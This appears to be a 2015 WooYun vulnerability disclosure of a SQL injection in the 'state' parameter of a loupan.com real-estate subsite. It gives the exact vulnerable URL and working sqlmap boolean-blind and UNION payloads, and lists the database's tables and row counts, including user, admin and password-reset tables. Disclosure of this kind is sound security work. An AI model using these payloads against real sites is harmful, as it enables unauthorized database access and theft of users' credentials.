当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145494

漏洞标题:楼盘网某站存在SQL注入可UNION(涉及大量用户与密码信息)

相关厂商:loupan.com

漏洞作者: 深度安全实验室

提交时间:2015-10-09 11:53

修复时间:2015-10-14 11:54

公开时间:2015-10-14 11:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

楼盘网某站存在SQL注入可UNION(涉及大量用户与密码信息)

详细说明:

http://duyun.loupan.com/index.php?apartments=0&area=628&c=house&decorate=1&existing=0&feature=829&keywords=e&m=get_house_combox_list&page=2&price=0-2000&property=7&state=5&subway=0 注入点:state参数

111.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: state (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: apartments=0&area=628&c=house&decorate=1&existing=0&feature=829&keywords=e&m=get_house_combox_list&page=2&price=0-2000&property=7&state=(SELECT (CASE WHEN (2116=2116) THEN 2116 ELSE 2116*(SELECT 2116 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&subway=0
Type: UNION query
Title: Generic UNION query (NULL) - 93 columns
Payload: apartments=0&area=628&c=house&decorate=1&existing=0&feature=829&keywords=e&m=get_house_combox_list&page=2&price=0-2000&property=7&state=5 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627871,0x6350586d64564a666f4b,0x7171787671)-- &subway=0
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
Database: loupan2013
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| lp_attachments | 23171052 |
| lp_news_info | 1962040 |
| lp_news | 1961092 |
| lp_admin_log | 1386782 |
| lp_group_buy_forms | 753439 |
| lp_news_position_relation | 744647 |
| lp_houses_click_cache | 630522 |
| lp_houses_pic_mating | 541599 |
| lp_sms | 487369 |
| lp_houses_pic_draw | 347918 |
| lp_user_balance | 281866 |
| lp_users | 281787 |
| lp_users_link_accepter | 281547 |
| lp_houses_trend | 213800 |
| lp_email_validate | 166546 |
| lp_houses_pic_focus | 160562 |
| lp_user_operation_refresh | 141211 |
| lp_houses_price_history | 136115 |
| lp_houses_pic_real | 91314 |
| lp_user_operation_promotion | 84062 |
| lp_houses_info | 77394 |
| lp_houses | 77392 |
| lp_notice_new_record | 76722 |
| lp_houses_score | 75799 |
| lp_houses_pic_effect | 61532 |
| lp_weixin_member | 55752 |
| lp_admin_sites | 53285 |
| lp_houses_pic_model | 51485 |
| lp_ci_sessions | 49800 |
| lp_houses_thumb_cache | 49100 |
| lp_toupiao | 39975 |
| lp_telephone_set_pool | 31505 |
| lp_ads_sites | 22318 |
| lp_news_backup | 22282 |
| lp_broker | 22008 |
| lp_houses_comment | 20242 |
| lp_friend_links | 19414 |
| lp_cities_price | 18208 |
| lp_hlink_in_news | 16842 |
| lp_telephone_history | 16283 |
| lp_houses_pic_traffic | 14845 |
| lp_users_link_provider | 14156 |
| lp_ads | 11575 |
| lp_friend_link_investigation_error | 10459 |
| lp_admin_roles_permissions | 9850 |
| lp_user_operation_auto_refresh | 7137 |
| lp_news_keywords | 5891 |
| lp_cities | 5574 |
| lp_houses_prices | 5199 |
| lp_user_collect | 4402 |
| lp_houses_telephone_set | 3899 |
| lp_forum | 3193 |
| lp_fenxiao_referrals_history | 2344 |
| lp_message | 1864 |
| lp_youhui_list | 1685 |
| lp_special_keywords_old | 1420 |
| lp_houses_editor_comment | 1257 |
| lp_fenxiao_clients | 973 |
| lp_user_balance_history | 973 |
| lp_dissertation | 933 |
| lp_email_bind | 847 |
| lp_houses_attributes | 741 |
| lp_sms_queue | 690 |
| lp_loan | 671 |
| lp_fenxiao_history | 585 |
| lp_fenxiao_clients_disengagement | 569 |
| lp_admin | 552 |
| lp_admin_permissions | 539 |
| lp_telephone_balance | 511 |
| lp_sites | 509 |
| lp_group_buy | 492 |
| lp_email_get_password | 434 |
| lp_houses_fenxiao | 389 |
| lp_friend_link_application | 388 |
| lp_fenxiao_balance | 337 |
| lp_hpyold2new | 331 |
| lp_weixin_member_pio | 319 |
| lp_fenxiao_referrals | 270 |
| lp_fenxiao_new_broker | 244 |
| lp_feedback | 240 |
| lp_ads_positions | 180 |
| lp_user_operation_top | 178 |
| lp_frontend_pages_extra | 167 |
| lp_contact_info | 165 |
| lp_information_gathering | 155 |
| lp_weixin | 155 |
| lp_consultant | 154 |
| lp_user_atuo_refresh_templet | 140 |
| lp_merchants | 139 |
| lp_houses_special | 106 |
| lp_admin_roles | 92 |
| lp_special_keywords_old_related | 90 |
| lp_telephone_cost | 89 |
| lp_loupandai_msg | 71 |
| lp_fenxiao_user_collect | 61 |
| lp_special_keywords_comments | 46 |
| lp_notice_new | 45 |
| lp_dissertation_model | 44 |
| lp_frontend_pages | 40 |
| lp_fenxiao_xieyi | 33 |
| lp_news_position | 33 |
| lp_news_categories | 32 |
| lp_houses_parameters | 30 |
| lp_ads_pages | 27 |
| lp_telephone_recharge_history | 21 |
| lp_friend_categories | 15 |
| lp_special_keywords | 14 |
| lp_telephone_cost_bak201569 | 14 |
| lp_xfbiaoqian | 12 |
| lp_fenxiao_view | 11 |
| lp_fenxiao_balance_history | 10 |
| lp_telephone_cost_bak | 7 |
| lp_youhui_class | 7 |
| lp_lottery | 5 |
| lp_user_combo | 3 |
| lp_fenxiao_site_msg | 2 |
| lp_users_provider | 2 |
| coreseek_counter | 1 |
| lp_changelog | 1 |
| lp_customer_purchase_intention | 1 |
| lp_friend_link_investigation_cycle | 1 |
| lp_lottery_type | 1 |
| lp_loupandai_token | 1 |
| lp_store | 1 |
| lp_syn_phone_config | 1 |
| lp_users_accepter | 1 |
+------------------------------------+---------+

122.png

133.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-14 11:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无